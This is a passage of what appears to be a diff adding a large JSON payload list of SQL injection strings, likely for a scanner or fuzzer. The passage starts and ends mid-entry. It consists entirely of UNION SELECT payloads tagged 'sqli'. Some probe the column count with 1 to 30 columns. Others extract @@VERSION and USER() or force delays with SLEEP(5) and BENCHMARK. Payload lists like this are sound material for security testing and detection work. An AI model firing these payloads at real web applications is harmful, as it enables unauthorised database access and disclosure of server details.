"payload": "UNION ALL SELECT 1,2--", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1,2,3--", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1,2,3,4--", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1,2,3,4,5--", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1,2,3,4,5,6--", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1,2,3,4,5,6,7--", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1,2,3,4,5,6,7,8--", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1,2,3,4,5,6,7,8,9--", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10--", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11--", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12--", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13--", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14--", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION SELECT @@VERSION,SLEEP(5),3", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "high", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION SELECT @@VERSION,SLEEP(5),USER(),4", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "high", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "high", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "high", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "high", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "high", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "high", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "high", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "high", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "high", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "high", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "high", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "high", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "high", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "high", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "high", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "high", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "high", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "high", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "high", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "high", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "high", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "high", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "high", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "high", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "high", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "high", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "high", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION SELECT @@VERSION,SLEEP(5),\"'3", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "high", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION SELECT @@VERSION,SLEEP(5),\"'3'\"#", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "high", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION SELECT @@VERSION,SLEEP(5),USER(),4#", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "high", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5#", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "high", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6#", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "high", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7#", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "high", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8#", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "high", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9#", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "high", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10#", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "high", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11#", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "high", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12#", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "high", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13#", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "high", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14#", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "high", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15#", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "high", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16#", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "high", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17#", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "high", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18#", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "high", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "high", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "high", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "high", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "high", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "high", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "high", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "high", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "high", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "high", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "high", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "high", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "high", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT USER()--", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT SLEEP(5)--", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT USER(),SLEEP(5)--", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT @@VERSION,USER(),SLEEP(5)--", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A'))--", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL--", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL--", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL--", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL--", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL--", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL--", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL--", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT 